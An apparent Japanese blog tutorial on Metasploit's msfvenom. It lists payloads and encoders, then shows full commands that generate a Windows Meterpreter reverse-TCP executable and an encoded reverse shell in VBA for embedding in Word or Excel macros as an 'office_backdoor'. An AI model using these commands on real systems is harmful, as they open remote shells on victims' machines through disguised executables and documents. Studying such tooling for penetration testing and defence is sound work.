Shikata Ga Nai

Private? There is no such things.

msfvenomでペイロードをつくってみた

Hello there, ('ω')ノ

  

これまで、Metasploit Frameworkには、下記の2つのユーティリティがあって。

 

 msfpayload

  指定された形式でペイロードを生成するために使用され

 

 msfencode

  アルゴリズムを使用してペイロードをエンコードおよび難読化するために使用され

 

ただ、最新バージョンでは、これらのユーティリティがmsfvenomに統合されて。

msfvenomは独立したユーティリティなので。

msfconsoleを同時に実行する必要はくて。

 

使用可能なすべてのペイロードを一覧表示するには、下記コマンドで。

 msfvenom --list payloads

f:id:ThisIsOne:20200529121307p:plain

 

利用可能なすべてのエンコーダを一覧表示するには、下記コマンドで。

 msfvenom --list coders

 

f:id:ThisIsOne:20200529121436p:plain

 

下記のコマンドで、ペイロードの生成もできて。

IPアドレス192.168.1.27のポート8080でMeterpreterリスナーを起動するといった。

 

 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.27 lport=8080 -f exe > /root/reverse_tcp.exe

 

f:id:ThisIsOne:20200529144023p:plain

 

できあがったペイロードファイルをWindowsへ配布して、実行すると。

 

f:id:ThisIsOne:20200529144238p:plain

 

下記のように設定したリスナーにアクティブなMeterpreterセッションが返されて。

 

f:id:ThisIsOne:20200529143801p:plain

 

また、下記のようにVBA形式で生成されたペイロードだと。

Word / Excelドキュメントのマクロに埋め込むことができて。

 

 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.27 LPORT=443 EXITFUNC=thread -f python -e x86/shikata_ga_nai -f vba -o /root/office_backdoor

 

f:id:ThisIsOne:20200529145007p:plain

 

Best regards, (^^ゞ